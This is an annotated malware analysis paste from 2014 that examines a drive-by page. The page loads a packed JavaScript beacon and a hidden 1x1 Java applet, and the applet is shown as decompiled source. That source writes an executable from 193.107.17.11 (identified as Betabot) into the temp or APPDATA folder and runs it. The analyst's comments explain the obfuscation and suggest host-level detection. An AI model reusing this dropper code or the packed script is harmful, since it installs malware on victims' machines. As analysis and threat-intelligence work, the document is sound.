Xylitol

Malicious Java leading to Betabot

Apr 20th, 2014
  1. index.html:
  2. <html>
  3. <head>
  4. <title>Welcome</title>
     <!-- [analysis] Loads the packed script shown later in this paste as 6JVia9.js. -->
  5. <script language="javascript" src="6JVia9.js"></script>
     <!-- [analysis] 1x1-pixel applet, so effectively invisible on the page; it runs Java.class from Java.jar. -->
  6. <applet width='1px' height='1px' code='Java.class' archive='Java.jar' name='ATG-Security'></applet>
  7. </head>
  8. <body>
  9.  
  10. </body>
  11. </html>
  12.  
  13. ==============================================================================
  14.  
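  15. 6JVia9.js:
      (Note: the script below is packed in nested eval(function(p,a,c,k,e,d){...}) layers with a substituted word list, so it has to be unpacked statically in an isolated analysis environment before its behaviour can be read. The visible word list - createElement, script, src, encodeURIComponent, window, location, href, head, appendChild - suggests it injects a script tag that reports the page URL to a remote host; confirm after unpacking.)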
  16. https://www.virustotal.com/en/file/99225bbbb0b83fc3523b6a2c72ef239d24520311802434346fc6d550b5e45a03/analysis/1397995795/
  17.  
  18. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(c/a))+String.fromCharCode(c%a+161)};while(c--){if(k[c]){p=p.replace(new RegExp(e(c),'g'),k[c])}}return p}('і(­(p,a,c,k,e,d){ґ(c--){«(k[c]){p=p.Є(© ¬(\'\\\\b\'+c+\'\\\\b\',\'g\'),k[c])}}± p}(\'З(¶(Ґ,Ў,ў,¦,¤,Ё){¤=¶(ў){µ(ў<Ў?\\\'\\\':¤(К(ў/Ў)))+((ў=ў%Ў)>В?ё.»(ў+А):ў.О(Ю))};Э(ў--){Ь(¦[ў]){Ґ=Ґ.Я(а д(\\\'\\\\\\\\Ј\\\'+¤(ў)+\\\'\\\\\\\\Ј\\\',\\\'§\\\'),¦[ў])}}µ Ґ}(\\\'ў Ї="б";ў §="Щ.Ш-Х.е";ў Ў=["Ц","Ч","Ґ","Ф://","/У/П=Р.С.Т?¤=0&¦=","&Ъ=","г","Ы","¤","Н/Ѕ","ј","ѕ","ї"];Ј=Ё[Ў[1]](Ў[0]);Ј[Ў[2]]=Ў[3]+§+Ў[4]+Ї+Ў[5]+є(·[Ў[7]][Ў[6]]);Ј[Ў[8]]=Ў[9];Ё[Ў[№]](Ў[Б])[0][Ў[Й]](Ј);\\\',І,І,\\\'||||||||||Л|М|И|Г|Д|Е||Ж|в||ўВ|ўЇ|ў®|ў°|ў±|ж|ўІ|ў­|ў¬|ў§|ў¦|ўЁ|ў©|ў«|ўЄ|ўі|ўґ|ўѕ|ўЅ|ўї|ўА|ўБ|ўј|ў»|®\\\'.ў¶(\\\'|\\\')))\',®,ўµ,\'|||||||||||||a|c|e|b|p|k|g|d|±|­|j|l|o|f|h|ў·||n|A|G|°|H|||і|B|i|x|m|¬|t|s||©|Є|ўё|ґ|«|r|q|D|w|z|y|v|u|ўє|ў№|C|ўҐ|ў¤|р|п|с|т|у|о|н|и|з|й|к|м|л|ф|х|я|ю|ўЎ|ўў|ўЈ|I|э|E|F|ь|ч|ц|ш|щ|ы|ъ\'.°(\'|\')))',95,129,'13|14|16|15|17|18|19|20|new|replace|if|RegExp|function|10|23|split|return|45|eval|while|21|22|53|59|86|61|60|31|38|34|32|29|87|35|94|93|92|91|37|90|84|28|85|89|40|48|41|39|27|26|55|54|52|57|56|51|44|30|24|50|49|36|47|46|43|88|25|42|58|67|http|script|encodeURIComponent|window|head|getElementsByTagName|href|website|net|changeme|tracker|src|location|javascript|appendChild|var|scriptNode|js|php|document|type|getip|_0|createElement|text|wtf|username|callback|www|super|65|64|71|72|80|79|63|62|83|68|69|70|66|81|78|95|33|parseInt|toString|fromCharCode|String|76|75|73|77|74|12|11|82'.split('|')))
  19.  
  20. ==============================================================================
  21.  
  22. java.jar:
  23. https://www.virustotal.com/en/file/f0bbaadeb7eafe655ff06137de9324f97a71de24a4461458f4f3be97f9f564e6/analysis/1397995393/
  24.  
  25. import java.applet.Applet;
  26. import java.applet.AppletContext;
  27. import java.io.File;
  28. import java.io.FileOutputStream;
  29. import java.io.IOException;
  30. import java.net.URL;
  31. import java.nio.channels.Channels;
  32. import java.nio.channels.FileChannel;
  33. import java.util.Random;
  34.  
  35. public class Java extends Applet
      // [analysis] Decompiled applet dropper. init() picks a writable directory, downloads an
      // executable over plain HTTP, runs it, then terminates the JVM.
      // Writing files and spawning processes are outside the default applet sandbox, so this
      // presumably depends on the applet being granted full permissions (for example a
      // signed-applet prompt being accepted); this listing does not show how.
      // TODO confirm from the JAR manifest and signature.
  36. {
      // [analysis] Static branding string; nothing in this class reads it. A stable constant like
      // this is a candidate for a static signature over the class file.
  37. public static String Author = "Created by Foxxy Software. | foxxysoftware.in";
  38.  
      // [analysis] Constant-hiding helper: x - x is always 0, so every
      // LKC(Integer.parseInt("3")) in this class evaluates to 0.
  39. public static int LKC(int paramInt) {
  40. return paramInt - paramInt;
  41. }
  42.  
      // [analysis] Redirect helper: asks the browser to open a URL, then exits with status 0.
      // The URL literal is empty in this sample and new URL("") throws MalformedURLException
      // (an IOException), so as written only the catch branch is reached, which also exits with
      // status 0. Presumably a builder fills in a landing URL when the redirect option is
      // enabled; that is not visible here.
  43. public void IKD(AppletContext paramAppletContext) {
  44. try {
  45. paramAppletContext.showDocument(new URL(""), "");
  46. System.exit(LKC(Integer.parseInt("3")));
  47. } catch (IOException localIOException) {
  48. System.exit(LKC(Integer.parseInt("3")));
  49. }
  50. }
  51.  
      // [analysis] Applet entry point; contains the whole drop-and-execute chain.
  52. public void init() {
      // [analysis] arrayOfString1 layout: [0..2] are reversed, dash-separated names
      // ([0] decodes to "java.io.tmpdir", [1] to "APPDATA", [2] would decode to "user.home" but
      // the loop below stops before it); [3] is the working slot for the resolved path;
      // [4] and [5] are never used; [6] "23" is the radix used for the random file name.
      // Integer.parseInt("3") is simply the literal index 3 written indirectly.
  53. String[] arrayOfString1 = { "r-i-d" + "p-m-t".concat(".-o-i").concat(new StringBuilder().append(".-a-L".replace("L", "")).append("v-a-j").toString()), "A-T-A".concat("D-P-P") + "A-F-L".replace("F", "").replace("L", ""), "e-m-o" + "h-.-r".concat("e-s-u"), null, null, null, "23" };
      // [analysis] arrayOfString2 layout: [0] "false" is the redirect flag, [1] "" is the prefix
      // placed in front of the command line, [2] ".exe" is the extension of the dropped file.
  54. String[] arrayOfString2 = { String.valueOf(false), "", ".exe" };
  55.  
      // [analysis] i runs over 0 and 1. Each name is stripped of dashes and reversed, then looked
      // up: a name containing "app" goes through System.getenv (APPDATA), anything else through
      // System.getProperty (java.io.tmpdir). The result lands in slot [3].
  56. for (int i = LKC(Integer.parseInt("3")); i < 2; i++) {
  57. arrayOfString1[i] = new StringBuilder(arrayOfString1[i].replaceAll("-", "")).reverse().toString();
  58.  
  59. if (arrayOfString1[i].toLowerCase().contains("app"))
  60. arrayOfString1[Integer.parseInt("3")] = System.getenv(arrayOfString1[i]);
  61. else {
  62. arrayOfString1[Integer.parseInt("3")] = System.getProperty(arrayOfString1[i]);
  63. }
  64.  
      // [analysis] The first candidate that exists, is writable and is a directory wins, so the
      // temp directory is preferred and APPDATA is the fallback. Separators are normalised to
      // '/', a trailing '/' is ensured, and a random file name is appended: a random long
      // rendered in base 23 with the digits removed (only letters a-m remain) plus ".exe".
  65. if ((arrayOfString1[Integer.parseInt("3")] != null) && (new File(arrayOfString1[Integer.parseInt("3")]).exists()) && (new File(arrayOfString1[Integer.parseInt("3")]).canWrite()) && (new File(arrayOfString1[Integer.parseInt("3")]).isDirectory())) {
  66. arrayOfString1[Integer.parseInt("3")] = arrayOfString1[Integer.parseInt("3")].replace("\\", "/");
  67. if (!arrayOfString1[Integer.parseInt("3")].endsWith("/")) {
  68. arrayOfString1[Integer.parseInt("3")] = arrayOfString1[Integer.parseInt("3")].concat("/");
  69. }
  70. arrayOfString1[Integer.parseInt("3")] = arrayOfString1[Integer.parseInt("3")].concat(Long.toString(Math.abs(new Random().nextLong()), Integer.parseInt(arrayOfString1[(Integer.parseInt("3") + Integer.parseInt("3"))])).replaceAll("[0-9]", "") + arrayOfString2[(Integer.parseInt("3") - 1)]);
  71. break;
  72. }
  73. }
      // [analysis] If neither candidate qualified, slot [3] still holds the last raw lookup
      // result (possibly null) when it is used as the output path below.
  74. try
  75. {
      // [analysis] Streams the hard-coded URL into the chosen path, starting at offset 0 with no
      // size cap (the count is Long.MAX_VALUE). The transfer is plain HTTP, and the output
      // stream is closed only on the success path.
  76. FileOutputStream localFileOutputStream = new FileOutputStream(arrayOfString1[Integer.parseInt("3")]);
  77. localFileOutputStream.getChannel().transferFrom(Channels.newChannel(new URL("http://193.107.17.11/winpeace.exe").openStream()), LKC(Integer.parseInt("3")), 9223372036854775807L);
  78. localFileOutputStream.close();
  79.  
      // [analysis] Launches the dropped file; the command line is arrayOfString2[1] ("") + path.
      // On the host this appears as the JVM hosting the applet writing and then spawning a
      // randomly named .exe under the temp or APPDATA directory, which is the behaviour to
      // alert on.
  80. Runtime.getRuntime().exec(arrayOfString2[(Integer.parseInt("3") - 2)] + arrayOfString1[Integer.parseInt("3")]);
  81.  
      // [analysis] Reference comparison of "false" with String.valueOf(true); it is never true
      // in this sample, so IKD() is not called.
  82. if (arrayOfString2[0] == String.valueOf(true)) {
  83. IKD(getAppletContext());
  84. }
  85.  
      // [analysis] The JVM exits with status 0 both on success and on any IOException from the
      // download or the write, so a failure leaves no visible error.
  86. System.exit(LKC(Integer.parseInt("3")));
  87. } catch (IOException localIOException) {
  88. System.exit(LKC(Integer.parseInt("3")));
  89. }
  90. }
  91. }
  92.  
  93. ==============================================================================
  94.  
  95. http://193.107.17.11/winpeace.exe <- Betabot
  96. http://cybercrime-tracker.net/index.php?search=notchangeme.su
  97. --> http://3.bp.blogspot.com/-1xuhhlJ87hE/U1KWeSJ74sI/AAAAAAAAlrs/oMs2iaIqK2Y/s1600/19-04-2014+17-28-54.png